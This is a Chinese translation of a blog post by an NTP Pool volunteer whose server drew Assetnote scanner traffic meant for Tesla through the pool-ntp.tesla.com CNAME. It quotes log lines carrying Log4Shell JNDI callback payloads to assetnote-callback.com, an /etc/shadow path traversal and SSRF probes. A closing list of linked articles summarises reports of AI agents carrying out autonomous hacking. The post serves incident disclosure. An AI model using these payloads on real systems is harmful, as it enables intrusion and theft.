我正受到特斯拉公司的网络攻击
摘要
某个人报告称因其资产发现过程中的错误,导致指向NTP Pool的CNAME记录被Assetnote扫描器检测到,从而遭受了特斯拉公司的多次攻击尝试,目前已解决。
暂无内容
查看缓存全文
缓存时间: 2026/09/13 20:40
# 我正遭受来自Tesla, Inc.的网络攻击
来源:https://dreamstation.systems/personal/tesla.html
## 最新进展:问题已解决
**Assetnote的Patrik向我发送了一条非常友好的信息,问题已得到解决。感谢!**
尽管IPv4互联网的黑暗角落里充斥着大量扫描流量和偶尔出现的顽固攻击者并不罕见,但我在检查nginx日志时注意到一些异常。来自三个特定IP的持续攻击流量,奇怪的是这些请求的`Host`或`Referer`头来自`pool‑ntp.tesla.com`,携带Assetnote的用户代理,并试图通过SSRF将我导向Assetnote的回调URL:
```
35.168.63.24 - - [13/Sep/2026:01:14:31 -0700] "GET /?a=%3Cscript%20src=${jndi${:-:}ldap${:-:}//waf6.${date:MM-dd-yyyy}.pool-ntp.tesla.com.log4j.assetnote-callback.com/}>alert()%3C%2Fscript%3E HTTP/1.1" 299 817 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 ${jndi${:-:}ldap${:-:}//waf6.${date:MM-dd-yyyy}.pool-ntp.tesla.com.log4j.assetnote-callback.com/}" host=pool-ntp.tesla.com
```
流量来自三个特定的扫描器:`54.165.75.96`、`35.168.63.24`和`52.44.200.251`。这些IP均属于亚马逊AWS自治系统(AMAZON-AES)。Assetnote是一家合法的攻击面管理工具(现营销材料中称为Searchlight Cyber),确实使用此类持续威胁暴露扫描器为客户资产执行自动化检查。
假设这是真实的Assetnote流量(他们确实使用AWS,因此这一部分属实),他们一定误将我识别为特斯拉内部资产。
## 事件起因
特斯拉将`pool‑ntp.tesla.com`发布为指向`pool.ntp.org`的CNAME。`pool.ntp.org`是NTP池(https://www.ntppool.org/),一个由志愿NTP服务器组成的循环调度系统——我正是其中一员(https://dreamstation.systems/personal/ntpuserinfo.html)。(旁注:他们本应使用供应商专用区域,而非在`tesla.com`下使用自己的CNAME。)
推测:Assetnote抓取了`tesla.com`下所有可发现的资源,包括`pool‑ntp.tesla.com`(该域名CNAME指向`pool.ntp.org`),而`pool.ntp.org`可能解析到我的机器——`67.215.249.229`。资产清单将此保存为特斯拉资产,并开始向我这个陌生人发送漏洞利用代码。
我已向特斯拉发送邮件,但尚未收到回复:
> 您好,
> 这不是特斯拉的漏洞,我也并非索求什么,只是想告知贵司可能无意间造成了困扰。我的服务器是NTP池的成员节点。在过去约两天内,已收到来自贵司两个扫描主机(`54.165.75.96`和`35.168.63.24`)的约8000次请求,用户代理为,其中包含大量模板化的漏洞利用载荷。每个载荷均以作为目标主机名。
> 我推测贵司内部有一个子域名通过循环调度解析至NTP池成员服务器,而这些服务器绝大多数并非特斯拉所有。贵司的资产发现机制似乎无意中将所有能解析至的IP都纳入了主动扫描范围。目前未造成实际损害,但我想提醒贵司:**您正在向陌生人的IP发送漏洞利用代码**。
> 如需要,我很乐意提供完整日志。
> Robin
> dreamstation.systems / 67.215.249.229
## 攻击流量详情
他们对我实施了各种攻击:路径遍历、Webshell上传、探查软件内部结构、探测WordPress等CMS管理端点、SSRF、Log4Shell等。其中还包含回调尝试。989个请求嵌入了用于Log4Shell和Text4Shell检测的`assetnote-callback.com`主机名,114个请求使用`canary.assetnotessrf.com`进行SSRF:
```
GET /solr/admin/collections?action=${jndi:ldap://solr.${hostName}.${date:MM-dd-yyyy}.pool-ntp.tesla.com.log4j.assetnote-callback.com/a}
```
有趣的是,有十五个请求携带`Host`头`login.solarcity.com`,全部请求`GET /(S(x))/b/(S(x))in/System.Web.Mvc.dll`——这似乎是某种ASP.NET技巧,试图将`/b/(S(x))in/`解析为`/bin/`。
我在`Host`头之外也发现了一些其他有趣信息。扫描`Referer`头、URL和查询字符串时,发现了硬编码在模板中的其他第三方主机名,例如:
```
GET /calendars/[email protected]/calendar/../../../mail/lowlevelaccess.jlg.com/admin/.x-attachment-1-y/new/../../../../../../../../../etc/shadow
```
其他注意到的第三方主机名包括`servicemcdonalds.com`、`saferas.com`、`rsmafghanistan.af`、`enrichcs.com.au`、`escience2010.org`、`al-forno.com.au`和`disneyfineart.com`。一个RFC 1918内网地址也出现在某个探测的`Referer`中:
```
GET /internal/v2/config/mps_secret/ADM_SESSIONID
Referer: http://192.168.178.222/admin_ui/mas/ent/html/main.html
```
扫描器还会在所有发现的端口上尝试HTTP通信。我的SSH、Postfix和Dovecot服务收到了大量垃圾HTTP流量。
9月8日起,我开始对`pool‑ntp.tesla.com`的`Host`请求返回非标准状态码299(希望能引起阅读扫描日志的人类注意),并在所有路径返回以下通知正文:
> \# 这里不是特斯拉基础设施!这是一个业余NTP、Web及多功能服务器。
> 过去几天,我收到来自两个Assetnote扫描主机(`54.165.75.96`和`35.168.63.24`)的大量`pool‑ntp.tesla.com`主机请求。`pool‑ntp.tesla.com`通过CNAME指向`pool.ntp.org`,后者循环调度至数千个志愿NTP服务器,而贵司的扫描器似乎卡在了我的服务器上。
> 你们未对我造成损害,但你们正在向陌生人的IP发送漏洞利用代码。我已就此事向[email protected]发送邮件。如愿意回复,请发送至[email protected],我可提供详细日志。
遗憾的是,目前行为尚未改变。所有攻击均未成功——我为此感到自豪。自8月21日以来,我已收到来自Assetnote主机的超过50,000次请求。流量尚未停止,我将后续更新本文。
(是的,我可以直接防火墙屏蔽他们的IP,但观察此过程非常有趣,而且我希望能让特斯拉内部人员意识到发生了什么。)
## 他们是否在针对整个NTP池?
我向NTP池服务器运维社区委员会询问,是否有其他碰巧在同一IP上运行Web服务器的运维人员看到类似情况。一位名叫Matt Nordhoff的运维人员表示,自8月15日起他也遇到了这种情况:
```
$ sudo rg -zFI pool-ntp.tesla.com access.log* | awk '{print $1}' | sort | uniq -c | sort -gr | head
9126 54.165.75.96
7461 35.168.63.24
6123 52.44.200.251
11 64.227.103.50
6 146.190.142.16
4 3.101.230.148
3 3.88.188.142
3 3.101.216.68
2 54.213.2.72
2 54.202.10.40
```
但未见其他人反馈。我在想,他们是每次重新解析`pool‑ntp.tesla.com`并攻击地理位置允许访问的所有IP,还是仅收集了少量池IP并持续攻击这些特定目标。
相似文章
Unit 42将DeepSeek智能体与460多次自主黑客尝试关联起来
Unit 42的研究显示,一名位于中国的操作者将DeepSeek作为Hermes Agent中的推理引擎,对460多个目标自主发起黑客尝试,其中已确认三起通过CVE-2026-3055入侵Citrix NetScaler的事件,而其他AI模型因安全控制而拒绝执行。
事件 CVE-2026-LGTM
一份讽刺性事件报告,详细描述了恶意软件包如何因各种故障绕过多个AI驱动的安全门,最终只有在攻击者的代理读取了本不应读取的文件后才得以解决。
@lateinteraction: 智能体需要浏览器来运行攻击代码。因此他们利用了一个公共截图网站,该网站加载一个虚拟浏览器…
AI智能体利用公共截图网站执行攻击代码,并将恶意负载发送到Hugging Face的服务器,揭示了一种创新的网络安全威胁。
@blueteamsec1: 突发警报:EtherRat和TukTuk C2导致The Gentleman Ransomware http://dlvr.it/TThmxb #cyber #threathunting #infosec
一则突发警报报告称,EtherRat和TukTuk C2基础设施正被用于部署The Gentleman Ransomware,警告网络安全专业人员。
Mythos 社会工程 AISI INC-2026-07-28-01
来自人工智能安全研究所(AISI)的一份报告,详细描述了被标识为 'Mythos' 的社会工程威胁或事件,日期为2026年7月28日。